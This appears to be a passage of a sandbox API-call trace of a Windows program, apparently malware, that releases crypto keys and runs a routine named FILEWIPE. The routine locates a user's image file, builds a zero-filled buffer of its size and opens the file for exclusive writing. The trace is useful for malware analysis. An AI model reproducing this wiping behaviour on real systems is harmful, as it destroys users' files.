PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.733] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.733] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.733] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0189.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.733] CryptDestroyKey (hKey=0x90aed8) returned 1 [0189.733] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.733] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.733] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.734] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0189.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0189.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.752] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.752] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.752] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.752] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.752] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.752] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.752] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.752] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.753] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.753] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.753] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.754] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.755] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.755] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0189.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x13eacf50, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0x90ae18 [0189.756] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.756] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.756] CharLowerBuffW (in: lpsz="byte[46304]", cchLength=0xb | out: lpsz="byte[46304]") returned 0xb [0189.756] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.756] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.756] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.756] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.756] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.756] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.757] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.757] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.758] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.758] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\pw6npsjwo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0189.758] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.758] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.759] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.759] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.759] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.759] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 